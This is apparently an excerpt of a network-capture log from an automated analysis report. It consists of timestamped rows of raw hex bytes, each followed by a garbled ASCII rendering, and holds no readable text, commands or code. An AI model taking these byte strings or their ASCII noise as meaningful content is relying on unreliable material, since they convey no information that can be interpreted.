0d e4 bd e3 27 34 53 51 d4 f6 d6 a0 6d 31 b6 5e 72 69 bb d6 40 b7 34 30 14 1e 20 0e
                                                                      Data Ascii: "(A':GK-)l/>01hj^(C0W'f:ENA^1;V (PkZ>iV3y,3=jm+<_R7SOiI(Z*g'Z?{@ct\0UW.}i5EE~B$k,]tsHGB|'4SQm1^ri@40
                                                                      2021-10-13 16:06:31 UTC196INData Raw: cd bd 20 51 24 56 62 34 0d c3 1e 43 7e db bd f9 5e bd 44 5e 55 83 9d e2 73 ff 81 38 92 a5 3e 23 c8 f9 f5 dc 0f e1 da d3 94 49 6c da 43 15 0a bc d4 0a d4 9d a5 3e d7 4b c0 3f dc ff 37 84 60 91 30 ae 66 22 b7 9d 45 86 b4 41 04 2a 58 2a 09 37 3a d0 73 54 86 66 c2 2b f9 62 a8 70 9b d7 06 11 88 cd 90 07 98 ed 0a bc 0a ca cd 70 f6 d4 b8 b5 d7 67 52 47 d1 e0 59 1b 6a dd d2 fc 7d a0 09 10 89 68 5d 96 cd ef 13 50 7e b2 2d f6 5a 0a 04 45 1b 78 4c 8a 26 dc 31 d3 29 3b 2b cd db cd 63 a9 83 14 84 21 29 12 1e 21 65 de c4 02 b1 2c 27 83 90 28 20 17 5d 45 c6 f5 dc 0c ba 9c 26 7c 5c ac 93 a1 d7 e0 8a 14 42 cc ad 1d a8 df 20 f3 e7 c3 f8 46 65 f9 d8 d4 e1 2a 1e 8f ba ec 77 ec bb f8 60 87 01 00 8d 99 ec b8 88 91 ba 60 62 c8 4a 7d eb cf d8 84 ff d0 6d 1f 63 ef 48 04 b3 4e c7
                                                                      Data Ascii: Q$Vb4C~^D^Us8>#IlC>K?7`0f"EA*X*7:sTf+bppgRGYj}h]P~-ZExL&1);+c!)!e,'( ]E&|\B Fe*w``bJ}mcHN
                                                                      2021-10-13 16:06:31 UTC198INData Raw: 1a 75 6f 03 8f bc d2 9c cf 3e e2 c1 ef 22 6c 59 74 95 1e 3c bb 2f 42 1d 3d d2 03 ee 48 bd ee c3 3a 18 5c 48 a8 af b2 8d 20 33 9a 60 4a 5a ec 90 05 de 3c 3b 2d 2e 11 3f 59 d2 0e 93 3b 14 84 33 85 44 09 dc 33 6f e9 b6 c7 fe c2 84 8a 15 e2 f4 3f 8a 3d e7 87 83 79 1d 31 a4 5a 0b e6 ac ef 35 d7 3b c6 2d b3 8b 43 3b d9 2f 4f 00 94 5c a5 6e 6d 42 69 da 8c f4 d7 66 8d 96 cf e7 b6 0e 3d 32 c7 f9 0c 98 b0 05 5f d1 c4 4e 2c d8 7e e4 3d c9 a9 8e b2 f3 cf 90 11 92 40 c8 f7 c1 ec 65 21 32 2b 58 d0 7c 88 43 cf c0 ff 94 70 7e 16 2c 15 8a b6 f6 f6 8e 6f 51 97 4b f3 75 fb df 21 c8 b3 f0 bc 39 14 53 07 47 fb fc 8b 42 97 f8 fe 04 75 a2 28 d6 e6 13 a5 69 0f 28 28 40 e7 b5 ab e2 76 4f 65 06 89 ca e2 21 0e e9 4c 87 84 f9 8f e6 62 be 09 30 62 bf 27 25 48 54 35 97 e0 4c eb 66 30
                                                                      Data Ascii: uo>"lYt</B=H:\H 3`JZ<;-.?Y;3D3o?=y1Z5;-C;/O\nmBif=2_N,~=@e!2+X|Cp~,oQKu!9SGBu(i((@vOe!Lb0b'%HT5Lf0
                                                                      2021-10-13 16:06:31 UTC199INData Raw: e7 81 72 8e e8 4c e1 c6 b3 da 1e 27 d8 ee b0 d4 1d 4a 94 92 89 14 d3 de e8 67 e6 12 39 f9 9e c6 ec 96 b9 df 22 48 ad 7d 7b 8a fd e0 f0 db fb 39 20 4a 8a 0f 1a d6 72 ca aa 28 b0 63 c4 56 49 fd 85 4a f2 86 34 b4 c1 d8 a3 11 ab 2a 5f 1f 0d 05 9d 1c 62 c9 ff 01 8f 39 d0 03 e6 ed 05 cd df 07 11 6e e8 91 9c 48 4f 1f ef 00 91 0a 10 9d 9a ed ee 7d f2 81 3e 24 47 95 58 73 36 bb 86 76 a0 9e 68 23 c0 24 0c b8 bc 9a 97 0e a8 c8 00 c8 8b 33 5e 8d ea 86 f8 0f 78 a1 c4 bf 31 a3 1c 04 b2 ab e6 10 99 0c 43 98 08 14 66 91 7d dc 21 48 4a f7 1b 03 b3 3e 19 2b 81 b7 6b 2e ac d5 49 24 53 c7 c7 99 53 dd 74 53 29 48 2f 9d 8e ad 75 0e 88 1f ea e3 3e 6a d1 93 39 0a 99 99 6d f6 57 84 4c c2 ab 08 bf 26 79 4f ab 22 0c 52 a0 b9 ea 62 56 e0 77 b7 99 7b a8 56 2d 97 da e1 33 0c d4 52 37
                                                                      Data Ascii: rL'Jg9"H}{9 Jr(cVIJ4*_b9nHO}>$GXs6vh#$3^x1Cf}!HJ>+k.I$SStS)H/u>j9mWL&yO"RbVw{V-3R7
                                                                      2021-10-13 16:06:31 UTC200INData Raw: de 82 26 92 fa 8d 16 73 c5 2f b1 ab 11 ab 05 26 2a 5b 54 e3 a6 91 a8 47 4e 66 54 8e c3 85 23 69 aa 6d 9b 93 e8 84 ff 25 8b 0d 01 66 bd 2b 29 26 76 5b 80 cc 56 c2 59 3a 9d 76 a4 18 40 a8 d7 15 20 cf 49 29 33 5c 1b 8d d8 ac e1 d7 b5 49 5a 95 5f 8c a7 fe b7 e0 a1 ff cb a5 b7 db 42 fe 5d 81 13 b6 a8 61 61 ee f0 f0 9a 54 71 1d 78 60 12 6c f3 23 2d 51 a1 f4 f5 6b da 4f 64 32 e0 8f 90 78 c6 c3 3c b5 c0 6e 43 9b ea d3 b5 23 d3 da c4 ae 0b 49 fc 26 66 6b ef e6 2d bd b4 97 3e da 6d a3 3f f9 9a 11 b0 14 93 36 da 70 1e d9 9f 10 d3 bc 71 77 2e 6c 5a 2e 25 5b e7 44 07 b6 42 ab 00 c8 62 aa 49 ec fe 3c 7e a1 ff c3 14 8f f0 3b 92 5c 8d db 61 d2 f9 98 95 b6 72 61 17 c1 d9 3f 11 50 b8 e5 de 0f ac 31 77 ef 7d 32 9c eb 8e 23 62 2d 85 08 9f 70 3a 04 54 23 2b 7e af 4f f5 01 d3
                                                                      Data Ascii: &s/&*[TGNfT#im%f+)&v[VY:v@ I)3\IZ_B]aaTqx`l#-QkOd2x<nC#I&fk->m?6pqw.lZ.%[DBbI<~;\ara?P1w}2#b-p:T#+~O
                                                                      2021-10-13 16:06:31 UTC201INData Raw: 63 2f 99 8d c3 44 0a 8f 25 b9 ce 29 6b d3 ad 28 11 9b 8e 71 f2 57 89 50 cb ab 3c bf 26 74 6f b6 33 01 50 b6 8f 99 4d 3a cd 69 d2 da 52 c1 61 30 f8 ec e9 33 1e cb 2b 20 dd ff 84 bf a6 0e bd 84 9e 98 00 1a 81 07 72 23 d1 e1 60 e7 4b 89 64 27 7b 28 10 ee 14 5c 90 9e 8e 15 48 18 26 01 f3 d2 6e 4b 52 cd 7a 64 89 13 10 2b 20 80 bc d6 a5 c5 09 f3 b3 da 22 65 3d 7a 9e 0d 2e 91 25 43 52 18 f3 0e ec 59 b3 d0 b7 0b 0f 44 55 91 af 85 9c 52 15 94 60 3a 6f ec 97 24 d2 22 20 05 32 01 09 2d e3 02 82 3e 71 bb 1b 87 4f 1e a5 38 76 f7 9d c9 f7 a7 e3 88 04 c9 e7 3a 85 26 e5 85 e7 7b 78 22 9e 79 04 c5 b7 e9 1d b9 38 ca 38 82 8e 4c 20 db 2d 2b 07 f9 15 b5 57 08 5e 70 8f 85 f8 c0 56 a0 87 aa dc d7 08 34 32 de c2 1d 98 dd 62 6c c4 ee 57 2b fa 48 f5 04 dc be 82 c6 f1 ec 8b 22 b0
                                                                      Data Ascii: c/D%)k(qWP<&to3PM:iRa03+ r#`Kd'{(\H&nKRzd+ "e=z.%CRYDUR`:o$" 2->qO8v:&{x"y88L -+W^pV42blW+H"
                                                                      2021-10-13 16:06:31 UTC203INData Raw: ae ef df 15 89 d6 33 a7 3d a4 d9 70 c7 f3 92 86 a7 72 6d 28 dd b6 18 0a 5b a8 db cf 13 b1 11 65 83 52 18 89 f8 8a 21 73 17 9e 14 f6 57 33 72 61 20 11 6e 92 56 fe 14 b2 15 05 44 c2 c9 b5 62 9b f3 03 ba 4e 23 45 4d 2b 51 b5 c7 21 f4 33 13 e6 a3 34 3b 2f 33 08 e8 f1 de 3f be 95 2d 4d 61 83 f0 86 ff 94 a0 23 2c 88 92 78 99 d8 64 d0 cc a0 cd 77 15 c5 e9 bb ee 72 6d 88 96 b3 50 d1 c8 ff 4a ee 14 2c e4 90 da b8 88 ac ce 7d 68 bc 68 50 9e f8 c5 e1 c9 ea 1f 30 4a 9b 66 32 dd 06 cd aa 2b a1 06 fa 17 78 e3 8e 4a cf 92 21 ff 82 c4 a8 16 80 1b 51 18 17 05 97 2d 4e d5 ec 11 fb 16 d6 01 83 fb 03 da c4 10 7e 43 87 af 98 5b 54 14 88 13 8a 15 34 93 bb f0 ef 67 ff f5 19 23 4c 95 58 73 36 bb 8c 6c a4 93 51 2f d8 0e 17 8c a7 f6 84 1e ae f2 53 c7 87 21 75 85 fa 8d ce 05 61 bb
                                                                      Data Ascii: 3=prm([eR!sW3ra nVDbN#EM+Q!34;/3?-Ma#,xdwrmPJ,}hhP0Jf2+xJ!Q-N~C[T4g#LXs6lQ/S!ua
                                                                      2021-10-13 16:06:31 UTC204INData Raw: da 2b e8 3e b8 bf 59 37 c8 40 7f 0a d3 70 b8 5f 7a 53 7e df 83 ef d5 64 8c 87 aa c3 d7 3e 3f 25 ee ef 0c 8f e0 03 48 c4 f6 5e 2b d8 5f 81 08 c6 af 8a b4 96 cb 96 09 b5 4a d4 d5 d6 fb 74 44 33 4e 6e e6 67 9a 54 e5 e3 e0 87 6f 7e 16 3d 36 97 da f5 f6 88 64 60 9d 43 83 66 ea ba 15 ba 8f f8 87 22 10 46 21 28 c5 e9 90 52 bf ef 8d 10 71 b1 12 92 c5 01 9e 60 31 22 37 45 e3 a0 ce 91 52 5f 5e 10 86 d7 d7 21 7d c5 52 94 85 ee e1 c1 6e ab 26 1f 6a ac 2d 2f 29 63 3f a5 c0 47 ea 6c 29 f9 46 a2 3a 48 df fc 02 57 e5 5a 5d 31 6c 72 a0 d4 b7 8f f4 dc 6e 0e 95 0b a6 a6 ef d8 c7 ba f4 cd d1 95 ee 44 d4 59 87 1f a6 84 7d 74 81 d1 89 aa 4c 71 11 24 74 12 62 ee 2f 20 42 ca cf ea 65 cf 26 59 30 94 99 90 78 c1 e4 3e b2 e0 2a 05 a7 ec a1 8f 22 d7 b1 f5 b5 0c 5a fd 2c 22 5f db f7
                                                                      Data Ascii: +>Y7@p_zS~d>?%H^+_JtD3NngTo~=6d`Cf"F!(Rq`1"7ER_^!}Rn&j-/)c?Gl)F:HWZ]1lrnDY}tLq$tb/ Be&Y0x>*"Z,"_
                                                                      2021-10-13 16:06:31 UTC205INData Raw: 55 43 f4 fc af 46 53 0e 8e 39 8b 0b 44 b1 a6 f7 ea 6d e3 86 22 39 4c e6 3f 45 3b 97 bb 7d bb d1 4e 2f d9 3e 56 a9 ac 91 96 17 bb df 45 d7 9e 35 64 bd ec 9d e5 04 65 d5 e0 af 29 88 20 18 b4 c7 d0 15 8c 31 58 ad 01 7b 45 80 61 ff 38 4e 59 e2 06 05 b2 12 0b 58 97 d2 51 10 88 de 65 2a 4c c6 c1 a4 7e f5 74 50 2e 4a 37 bb 91 a6 45 0e 8f 13 85 c5 39 1e f2 bd 2f 1c ae 91 30 c5 57 86 53 c2 c8 3b b3 3d 45 59 d8 21 06 48 8c 91 8b 59 53 e2 71 bf d8 4a b5 4a 30 99 dd ed 50 0a c3 4f 0e c2 9a af a6 cf 27 ba 9b fb 98 00 1a 8d 08 78 70 c6 e8 7d cc 46 98 63 2b 47 32 11 8b 27 54 f7 bc 93 2e 6a 09 3c 1e f2 cf 1d 49 64 cd 57 46 9a 11 65 1f 36 e6 b7 d2 a5 ff 19 ef a0 cd 30 08 7a 78 8f 3a 19 b5 39 54 1d 39 c5 0e d7 51 b3 da d2 0d 13 5e 4a 81 a5 a4 9b 20 23 8c 7e 4e 4d e4 cd 22
                                                                      Data Ascii: UCFS9Dm"9L?E;}N/>VE5de) 1X{Ea8NYXQe*L~tP.J7E9/0WS;=EY!HYSqJJ0PO'xp}Fc+G2'T.j<IdWFe60zx:9T9Q^J #~NM"
                                                                      2021-10-13 16:06:31 UTC207INData Raw: 10 a6 c1 68 63 9a fc cd 8c 46 75 05 3a 50 60 44 c5 39 3a 58 ec ef fd 79 c8 4a 7e 55 ad ba 85 55 c4 f9 0f a3 d6 2d 1b bc 9e d2 b9 39 eb 8f e3 a4 3b 69 e8 26 3e 2b bc c5 3a b6 99 9c 57 fa 70 b4 5e da 92 21 a1 23 9e 0c cb 6c 03 b7 ab 69 f5 a6 71 69 63 40 4b 25 00 5d f6 48 31 ac 44 c2 36 c2 0e ab 4a fe fd 35 7f b4 9b d1 14 89 f8 36 9d 31 af d0 61 82 ce 9f 95 be 74 6b 29 de d3 37 0c 3c 85 db c6 39 aa 3c 65 82 5b 33 85 9b 88 34 73 21 a1 1b 84 7b 33 70 00 0b 1d 7e 8d 47 e9 03 bd 15 6c 4c c9 f8 92 42 8b f1 05 b6 4f 39 45 57 14 77 b0 c6 05 de 22 1e f7 d3 27 37 34 02 44 c6 e0 d8 26 96 9e 27 69 4b 92 fd 97 8f 87 ac 38 1d cb 9a 68 83 f3 20 d2 da b7 e0 4a 0c d2 eb 97 ef 07 70 99 e2 ab 71 c0 f8 f4 59 f5 27 37 f8 91 c0 b8 aa a7 de 63 58 ab 6c 54 9f 8b c3 e1 dd e0 03 18
                                                                      Data Ascii: hcFu:P`D9:XyJ~UU-9;i&>+:Wp^!#liqic@K%]H1D6J561atk)7<9<e[34s!{3p~GlLBO9EWw"'74D&'iK8h JpqY'7cXlT
                                                                      2021-10-13 16:06:31 UTC208INData Raw: 78 57 01 eb 6d 66 81 0d 64 1d 3c ad b5 ce d1 c6 23 87 a6 c6 43 5b 44 6e 8f 1c 1c fa 18 42 7e 0b d2 13 ea 45 fc fe c5 31 0d 49 4a 82 b2 b7 98 48 09 f5 6a 5f 5c d6 a2 05 c4 36 38 02 2d 0c 5a 1e f4 13 a6 2b 14 95 0b 9e 49 02 bb 2a 71 f6 9d c5 f8 cb fd ed 17 f3 df 35 a5 30 e0 9a 82 6f 6e 10 a0 43 3d c8 bc 88 3d cc 33 db 25 ad b2 54 52 fb 2e 52 65 d6 79 b9 59 63 79 72 ff 9b 9d e7 70 9a 87 aa dc f9 29 24 28 f5 e2 04 98 9e 31 5f d7 f2 5a 33 d4 57 e0 39 c1 b4 81 e8 d0 e6 8d 10 97 51 ce c6 c1 fa 2e 63 28 20 4d fd 70 fb 41 f9 d1 d0 a1 6d 6b 03 25 03 8d a3 e1 fa 9f 5a 4f bf 4b 9e 7c ec a6 67 f9 ae f8 94 20 10 70 0b 35 cd fa 91 49 a8 e4 8d 10 71 b1 12 84 ce 15 a5 76 36 3f 22 33 e1 b7 ba bd 74 4a 71 35 8b cd f1 3d 0e fb 4b 83 8c f5 95 eb 0b b0 15 2c 46 ad 3a 21 24 78
                                                                      Data Ascii: xWmfd<#C[DnB~E1IJHj_\68-Z+I*q50onC==3%TR.ReyYcyrp)$(1_Z3W9Q.c( MpAmk%ZOK|g p5Iqv6?"3tJq5=K,F:!$x
                                                                      2021-10-13 16:06:31 UTC209INData Raw: 9d ed 81 e3 c9 4c 4c 8e f5 1e e3 89 2e bb ba e3 bd 1f 79 a9 86 f4 81 73 0c 6d 67 e8 34 b5 ba 91 3e 87 67 50 83 f1 b6 bc ef c8 b8 2c 3d c8 08 36 6b 1a 8f 81 ba 89 70 4b 5f ea 2f 5d a1 86 03 d6 58 d4 62 85 50 2e 96 e1 3f a8 f9 44 d2 c0 a5 c8 67 f3 69 32 70 77 71 73 cd 35 b6 9d 09 89 5f bb 7d ee b0 6f a9 8d 60 10 23 9b f8 ec 28 35 74 e9 57 e6 64 49 e3 ed 9d 9c 09 9f fc 4e 56 22 87 bf d7 47 c4 cf 0a 56 3a 1e 4a a0 47 76 f8 c9 f6 ff 6b dd ab 0e bd 6e 8a 13 4e 4e e6 0a bf 04 55 5e c4 5b d7 68 64 57 76 ab 74 e9 78 24 6a 88 12 07 e0 0c a2 c8 ce 2f a3 73 6d d5 79 58 58 f6 37 f4 4a e1 b0 14 c6 ec a4 84 ec 11 a0 98 ea 5f 2c 53 e6 61 0e 25 ef 2a 68 6a 7e 57 1b b3 44 ad 60 d7 f4 1d a6 38 e0 35 87 a8 4e d4 43 ab df c9 d2 9a 38 d3 dd e2 3d 3d af 07 da 84 3a c9 2d 5a d8
                                                                      Data Ascii: LL.ysmg4>gP,=6kpK_/]XbP.?Dgi2pwqs5_}o`#(5tWdINV"GV:JGvknNNU^[hdWvtx$j/smyXX7J_,Sa%*hj~WD`85NC8==:-Z
                                                                      2021-10-13 16:06:31 UTC210INData Raw: 44 5e 15 ef 3c 41 ed 87 eb 51 06 70 ed 7e f1 1f 4f 6d 03 4b 79 04 d9 06 9a 64 dd 73 6b 22 b0 9e 4c 80 e2 91 1e cf 3c 51 58 02 59 30 c3 be 45 b1 4c 6c 9f c1 75 5c 5d 41 15 a7 9e ab 7f ce f2 47 39 25 f1 8f f2 8f e8 d5 50 50 bd fb 00 f1 9a 2e a8 ad f6 a2 1c 67 a1 80 dc 81 6e 0c d8 ec f1 08 a9 b5 81 2a b2 66 5a 87 f8 b7 aa 6e 48 a8 a2 ee da 60 22 eb 89 80 99 bf 87 74 5e 36 f3 13 48 a1 87 13 d2 46 d5 7f 8b 25 37 8a fd 22 bb e3 59 d3 df ab ce 63 e4 68 31 6f 79 7c f4 7d 24 31 02 65 91 7f bf 4f 81 bf 65 bf ad 6a 11 2e 9b e0 f1 35 20 74 ea 70 e4 6b 44 fa cf 99 9f 14 8d e9 49 52 22 94 3d 0a 44 e4 cc 1a ca e3 18 4d b4 58 f9 6e c8 e8 e3 6a ca ac 01 ba fc c6 8c cf 81 f4 9f 78 97 58 86 d4 5d 57 c9 71 94 a5 b0 63 68 e1 37 ff 7f 95 63 e2 03 be 4a 25 25 9f 67 7e 5c e5 79
                                                                      Data Ascii: D^<AQp~OmKydsk"L<QXY0ELlu\]AG9%PP.gn*fZnH`"t^6HF%7"Ych1oy|}$1eOej.5 tpkDIR"=DMXnjxX]Wqch7cJ%%g~\y
                                                                      2021-10-13 16:06:31 UTC211INData Raw: 5b 51 54 03 be 61 dd b3 7f 3f b8 9e 33 57 b1 2d 85 50 ad c6 ea db 93 81 ee ff c7 21 b9 c5 b3 89 04 22 41 4e 2c 86 0e fe 3b 99 b8 8a fd 0a 17 67 49 51 e0 d4 9a 96 fc 3a 3e f7 20 f4 14 9d ce e7 26 de 95 e8 53 7b 29 67 5a ad 84 e0 3b df 93 91 6b 09 c0 5f 54 be 60 4e 14 5f 4e 46 2f 9b ce d3 e0 35 2d 02 51 c8 a5 8b 59 0d a8 23 e7 e6 9c e3 8e 17 cd 50 75 03 de 52 45 46 1f 5c f4 aa 3f 98 14 5e f1 1a cd 74 3a ad 84 75 4a 86 70 5a 7c 0b 60 61 b5 c7 81 be a0 0e 8c da 65 c7 c7 95 d0 99 cd 8c a9 ab ed bb 3e b3 2e e7 60 ce d3 8d 27 e6 be 8c f4 25 09 75 5e 2c 7d 08 96 c8 56 2b 8a b3 85 0f af a4 07 47 62 c4 ff 12 b6 84 40 c3 b8 5d 79 c6 83 a4 ce cf a9 c7 95 dc 4c 35 8a 51 d2 4a a1 97 51 c6 b3 f7 1e 9d 1f d3 5e 9a fe 58 d1 62 e7 77 2c 0b 75 b9 f6 0d 83 cf 11 0d 4a 08 37
                                                                      Data Ascii: [QTa?3W-P!"AN,;gIQ:> &S{)gZ;k_T`N_NF/5-QY#PuREF\?^t:uJpZ|`ae>.`'%u^,}V+Gb@]yL5QJQ^Xbw,uJ7
                                                                      2021-10-13 16:06:31 UTC212INData Raw: 1a d8 f1 14 44 af 57 76 f5 c7 e3 f2 f9 6b af 0e a1 e6 5a 0f c5 bf f4 9f 78 94 78 85 d9 5d c4 68 71 c2 b9 27 dc eb 76 38 e1 4d 14 32 f0 8f 01 4a 38 2b 90 73 6b c8 6d fa e9 e6 b9 2b 47 c6 b2 14 c7 0c b0 24 09 0a b5 12 31 59 39 d9 fd e3 cd 39 61 f5 67 e4 a5 44 0b b0 46 ed 6a c5 f2 16 9b 36 e3 38 a2 a5 41 d4 40 42 37 d6 54 63 3f d2 d2 e4 2f 28 88 01 c7 8b be 58 24 53 e5 a7 96 b1 ed b4 42 75 31 5e ca f2 a7 5a 56 51 f5 ce 54 68 f6 e4 a2 25 96 85 06 3a c8 e0 12 42 29 41 6c 85 7a 36 96 cc f9 e0 83 7c 5b 6c 92 b2 15 33 0f b1 25 06 f8 6b 02 ee dc e7 c2 36 91 b5 48 06 58 be 4d 1d 2f 9c 62 78 63 55 0b 29 13 70 b2 fa 3e 32 c0 d4 bf 55 78 2f a4 a5 d2 bf e0 3d 7e fd 07 3a 2b 98 61 bf ab 42 d7 ad 5d 70 7a 59 83 e7 72 5e 71 f5 6b f8 a1 f5 dd 79 83 c5 f6 a6 94 ab e8 ed 1f
                                                                      Data Ascii: DWvkZxx]hq'v8M2J8+skm+G$1Y99agDFj68A@B7Tc?/(X$SBu1^ZVQTh%:B)Alz6|[l3%k6HXM/bxcU)p>2Ux/=~:+aB]pzYr^qky
                                                                      2021-10-13 16:06:31 UTC214INData Raw: 4a e7 15 a5 93 dc 86 a1 78 77 db 9f b5 db 47 ba c7 95 dd 5b aa ae 5f 42 36 a1 97 42 c8 c7 ec 23 9d 17 e0 5c 9b 7d 60 cc 65 ef 60 a2 05 71 aa fd 0c 9b ce 09 18 50 0f 22 4d 41 38 92 2b 49 c7 3e c2 68 ae 7e fc 13 95 8d 4c 0c ce 86 82 55 f4 99 51 e8 59 c4 a3 10 8a 83 c5 e4 cf 13 16 c6 2a b7 4b f9 7c c8 a4 2b e4 c4 4d 91 af 30 41 ff 95 e7 4c 02 70 e3 fb f6 02 55 19 0e 50 64 16 cf a7 db 74 ba 69 71 28 b1 90 d0 1d e3 9f 6a d1 26 4d 47 0c c6 8b d0 ac 7d b6 5a 65 91 52 d9 53 52 dc 48 bc 91 38 d3 d2 e2 c2 79 2c e7 9d ff 81 ee db ce 47 86 e7 9c ad 8f 28 a7 d6 d1 3e bf 6d b9 8b d4 86 7c 10 e3 ec e4 1c a5 39 d1 30 87 67 50 83 f1 a5 3a a2 cf ba 21 35 c6 01 2c ef 8b 80 87 b2 8d 6d 58 34 ec 07 5d b7 07 8e dd 50 dd 6d 9f 3e 2c 9e ee 30 ae f7 4c c6 c6 a0 d3 77 75 f0 31 7f
                                                                      Data Ascii: JxwG[_B6B#\}`e`qP"MA8+I>h~LUQY*K|+M0ALpUPdtiq(j&MG}ZeRSRH8y,G(>m|90gP:!5,mX4]Pm>,0Lwu1
                                                                      2021-10-13 16:06:31 UTC215INData Raw: 29 13 63 a8 67 96 21 da a0 bf 55 75 35 2d ed dd de e0 3d 78 fd 05 28 41 81 eb 7e aa 5b 50 60 43 77 54 57 b8 60 f1 46 63 77 e7 eb 32 ed 9c 65 0c 90 ea 29 03 a6 96 6c 30 98 a5 64 f9 5a 8c f5 e2 14 00 53 dc 2b 5c b6 44 c8 62 d0 57 a7 46 da d6 23 5c b4 4e 23 6b 9c 1d cd 3d 04 26 0f 0d d7 93 a9 0c f4 f6 d2 b4 c5 f9 d4 5b 84 96 6c ef 32 7f 27 a0 89 52 58 bd 2f 9d 50 ad c6 ea d7 91 81 f1 75 eb 26 a8 21 32 87 1d 24 53 cd 15 9d 60 fe 06 9c b7 0c cc 08 3f 67 41 4e e0 d2 9a 8e ff 33 26 d2 2f f2 0e 9d db 60 b8 c0 95 f1 54 74 28 6c 68 af 93 f0 34 5b 04 8c 65 95 85 5f b2 a5 67 de 84 db 4c 49 b2 c6 dc c0 f0 b6 6b 0f 41 f9 26 34 46 00 bf 2c 60 e9 9e ef 9c 1e ce e7 c2 01 d2 41 49 4f 14 55 e1 28 bf 95 01 53 ff 32 cc 64 a6 35 9a 7a 50 85 20 40 53 03 77 ed b4 cd 89 b0 b7 1a
                                                                      Data Ascii: )cg!Uu5-=x(A~[P`CwTW`Fcw2e)l0dZS+\DbWF#\N#k=&[l2'RX/Pu&!2$S`?gAN3&/`Tt(lh4[e_gLIkA&4F,`AIOU(S2d5zP @Sw
                                                                      2021-10-13 16:06:31 UTC216INData Raw: b1 bb 9c 38 83 62 58 8d ff b0 bf ef c9 ba 26 d4 cb 09 24 ef 8d 90 04 26 8d 2d 59 3a ef 0b 5d b1 06 9e d7 58 d1 63 97 3d 2a 86 e0 3e a2 f0 44 d1 c1 af 36 65 f4 69 34 71 76 60 f3 6c 36 40 8f 64 8d 79 be 6d 85 b5 68 aa b0 73 91 81 82 fa f1 38 bd d2 e9 57 e1 70 4c fa c1 9d bc 09 99 fd 46 51 28 97 35 1e 4a f8 d2 1d de f7 12 42 a4 6a 7a f1 c1 fe e7 5b db af 0a a8 e9 42 0a c5 97 fc 82 6f 36 d7 8c c2 55 c2 6e 66 dc ac ad 6c e3 70 3c f6 67 08 2f e6 1c 33 c9 23 23 8b 7a 68 fd 7d 79 53 ef b7 27 5e 42 31 17 c5 b8 b3 27 6c 16 b2 19 37 5d a8 da f0 e7 d2 b4 ee fd 7a eb a0 5b 9d 20 cd 5c 6a c3 ed 9d 07 29 69 be a1 ab 4e dd 43 a8 ab d3 52 61 2e 51 d9 f8 a3 3f 9d 86 d7 9d 22 d0 a5 f1 fc a9 85 38 44 bf 2c 73 b2 f4 d0 da ae 55 c5 68 5f c3 68 62 f8 6c 15 3f be 83 13 b0 01 e0
                                                                      Data Ascii: 8bX&$&-Y:]Xc=*>D6ei4qv`l6@dymhs8WpLFQ(5JBjz[Bo6Unflp<g/3##zh}yS'^B1'l7]z[ \j)iNCRa.Q?"8D,sUh_hbl?
                                                                      2021-10-13 16:06:31 UTC217INData Raw: 1b 25 ab e5 46 68 71 97 c4 ea a2 37 e2 e2 8e 61 76 05 ce e5 8a 0b db 4d 52 c8 f5 49 73 4d 2e 9d 0a 49 79 f6 df f6 f2 b9 19 89 55 8b 2f 5f 44 9e 9e f1 3c 34 84 90 b1 0e 8e 3f 76 49 21 93 d6 8a ce 96 ae b7 70 52 3e ab 13 e7 6e 52 2d 1e 86 06 ad 9b 69 f5 05 f1 6f 2a 68 0a 86 58 c3 da 9d 3d 74 18 ba 2a 17 5b ee c1 ec 0a a5 8f 53 c5 ad 45 79 c0 83 af d5 6d b0 db 81 41 a1 26 81 4d 58 58 ba 9b 56 dc d0 f8 36 b7 19 d2 56 9c ed d4 48 61 e0 e5 42 17 65 36 61 11 94 52 f8 03 47 04 38 ca 14 38 94 22 5e cb 39 c5 67 be e3 d7 2f 89 10 bc 17 c0 99 97 7d f8 91 5f d5 5c df ac 94 1b 8a e3 63 3b 0a 03 40 b1 b8 5b 64 21 c1 ab b6 60 c7 58 10 ed 3f 53 e0 1a d6 56 27 7c f3 68 76 f2 53 0d 20 4e 7a 18 5d ca 89 e6 06 6d 6b 2d b1 89 c7 03 ec 03 a2 ce 24 45 42 3e 46 38 d4 b3 d6 60 41
                                                                      Data Ascii: %Fhq7avMRIsM.IyU/_D<4?vI!pR>nR-io*hX=t*[SEymA&MXXV6VHaBe6aRG88"^9g/}_\c;@[d!`X?SV'|hvS Nz]mk-$EB>F8`A
                                                                      2021-10-13 16:06:31 UTC219INData Raw: e1 1f a6 aa 5a c8 d3 b2 2b ca d3 6b 1f d4 d3 f8 a0 a7 81 16 53 04 3a c4 20 4f 79 a1 95 b2 5c ae 36 62 b8 e2 c9 da bb 4d c1 f9 7a 6e 75 7a 65 6e 18 03 b4 96 95 25 07 f4 10 62 2a 4e e3 16 7d 39 98 cc fa e0 bf 7c 47 f0 94 b9 35 2e 10 38 0c 0b c0 7e 05 7d c4 7f d1 a5 50 a8 5e 81 d3 3d 7e 03 1d 19 fa 6b f3 e9 56 22 00 7b a8 70 99 3a da a0 b2 55 78 35 2d ed c3 dc e9 28 7a e5 0c 38 36 89 f3 68 b7 4d 55 66 61 77 47 5c 99 69 ef 20 71 9e 7e 8b 20 59 dc 5a 02 b7 f8 be 9d a9 99 e8 6d 93 b7 76 ec 5c 99 f4 fa 00 00 54 c9 26 48 b9 d9 80 74 b9 5e aa 50 d8 fe 2c 4f bf 42 3b 62 9c 09 cb 3f 15 26 00 93 ff 81 a9 15 f4 f6 c7 b5 d1 69 d5 47 84 8b 69 ef 34 63 3c a2 99 26 5a af 44 8b 6d ab c6 ea db 93 94 fa 60 f3 2f bd a5 ae 8c 1d 24 4f 46 24 87 03 fb 25 99 ab 9e 71 07 0d e6 40
                                                                      Data Ascii: Z+kS: Oy\6bMznuzen%b*N}9|G5.8~}P^=~kV"{p:Ux5-(z86hMUfawG\i q~ YZmv\T&Ht^P,OB;b?&iGi4c<&ZDm`/$OF$%q@
